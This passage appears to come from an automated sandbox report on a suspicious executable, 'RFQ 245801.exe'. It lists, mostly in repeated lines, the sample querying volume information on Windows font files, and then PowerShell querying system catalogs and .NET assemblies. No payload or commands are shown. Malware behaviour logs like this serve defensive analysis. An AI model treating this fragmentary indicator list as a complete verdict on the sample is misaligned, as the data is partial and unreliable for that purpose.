          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
